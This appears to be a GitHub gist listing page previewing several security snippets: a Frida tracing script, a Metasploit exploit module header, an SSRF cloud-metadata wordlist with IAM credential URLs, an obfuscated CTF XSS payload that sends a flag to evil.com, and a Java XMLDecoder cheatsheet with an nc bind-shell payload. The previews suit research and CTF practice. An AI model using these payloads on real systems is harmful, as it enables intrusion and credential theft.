Skip to content

Instantly share code, notes, and snippets.

View pich4ya's full-sized avatar

LongCat pich4ya

106 followers · 0 following
View GitHub Profile
@pich4ya
pich4ya / flutter_ios.js
Created June 18, 2021 06:28 — forked from AICDEV/flutter_ios.js
Frida trace Flutter Functions on iOS
/**
* run the script to a running app: frida -U "appName" -l flutter_ios.js --no-pause
* start app direct with the script: frida -Uf bundleIdentifier -l flutter_ios.js --no-pause
*/
// #############################################
// HELPER SECTION START
var colors = {
"resetColor": "\x1b[0m",
"green": "\x1b[32m",
"yellow": "\x1b[33m",
@mdisec
mdisec / manageengine_appmanager_exec_0day.rb
Created April 19, 2019 20:33
ManageEngine Applications Manager Remote Code Execution 0day
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::FileDropper
@jhaddix
jhaddix / cloud_metadata.txt
Last active July 21, 2024 03:25 — forked from BuffaloWill/cloud_metadata.txt
Cloud Metadata Dictionary useful for SSRF Testing
## AWS
# from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories
http://169.254.169.254/latest/user-data
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/ami-id
http://169.254.169.254/latest/meta-data/reservation-id
http://169.254.169.254/latest/meta-data/hostname
http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key
@cgvwzq
cgvwzq / solution.html
Created December 30, 2017 11:45
34c3 - superblog
XSS vector:
<link id=foo rel=import href=/flag(1|2)>
<script src="/feed?type=jsonp&cb=payload"></script>
<!-- superblog 1 - flag: 34C3_so_y0u_w3nt_4nd_learned_SOME_javascript_g00d_f0r_y0u -->
<script>
document.write`${Array.call`${atob`PA`}${`l`}${`i`}${`n`}${`k`}${atob`IA`}${`r`}${`e`}${`l`}${atob`PQ`}${atob`Ig`}${`p`}${`r`}${`e`}${`f`}${`e`}${`t`}${`c`}${`h`}${atob`Ig`}${atob`IA`}${`h`}${`r`}${`e`}${`f`}${atob`PQ`}${atob`Ig`}${`h`}${`t`}${`t`}${`p`}${atob`Og`}${atob`Lw`}${atob`Lw`}${`evil`}${atob`Lg`}${`com`}${atob`Og`}${atob`Lw`}${Math.random``}${`_`}${escape.call`${document.getElementsByTagName`link`.item``.import.body.innerText}`}${atob`Ig`}${atob`Pg`}`.join``}`,
</script>
<!-- superblog 2 - flag: 34C3_h3ncef0rth_peopl3_sh4ll_refer_t0_y0u_only_4s_th3_ES6+DOM_guru -->
@EtienneR
EtienneR / main.go
Created January 6, 2017 12:05
A basic RESTful API in Go with Gorp & SQLite 3 - https://medium.com/@etiennerouzeaud/how-to-create-a-basic-restful-api-in-go-c8e032ba3181
package main
import (
"github.com/gin-gonic/gin"
"github.com/jinzhu/gorm"
_ "github.com/mattn/go-sqlite3"
)
type Users struct {
Id int `gorm:"AUTO_INCREMENT" form:"id" json:"id"`
@mgeeky
mgeeky / java-XMLDecoder-RCE.md
Created August 2, 2016 16:04
Java Beans XMLDecoder XML-deserialization Remote Code Execution payloads

Java Beans XMLDecoder Remote Code Execution cheatsheet

Having a functionality of file upload or other function that is parsing input xml-type data that will later flow through the XMLDecoder component of Java Beans, one could try to play around it's known deserialization issue. In order to test that issue there should be specially crafted XML-payload used that would invoke arbitrary Java interfaces and methods with supplied parameters.

Payloads

When one would like to start a bind shell on the target machine, he could use the payload like the following one:

Runtime.getRuntime().exec(new java.lang.String[]{"/usr/bin/nc", "-l", "-p", "4444", "-e", "/bin/bash"});
@zach-klippenstein
zach-klippenstein / ChangePassword.java
Last active June 23, 2024 19:01
The keystore password on Java keystore files is utterly pointless. You can reset it without knowing it, as shown by this code. Note that private keys are still secure, as far as I know. The JKS implementation is copyright Casey Marshall (rsdio@metastatic.org), and the original source is available at http://metastatic.org/source/JKS.java. I've in…
import java.util.*;
import java.io.*;
import java.security.*;
public class ChangePassword
{
private final static JKS j = new JKS();
public static void main(String[] args) throws Exception
{
@MohamedAlaa
MohamedAlaa / tmux-cheatsheet.markdown
Last active July 22, 2024 17:28
tmux shortcuts & cheatsheet

tmux shortcuts & cheatsheet

start new:

tmux

start new with session name:

tmux new -s myname
@spicycode
spicycode / tmux.conf
Created September 20, 2011 16:43
The best and greatest tmux.conf ever
# 0 is too far from ` ;)
set -g base-index 1
# Automatically set window title
set-window-option -g automatic-rename on
set-option -g set-titles on
#set -g default-terminal screen-256color
set -g status-keys vi
set -g history-limit 10000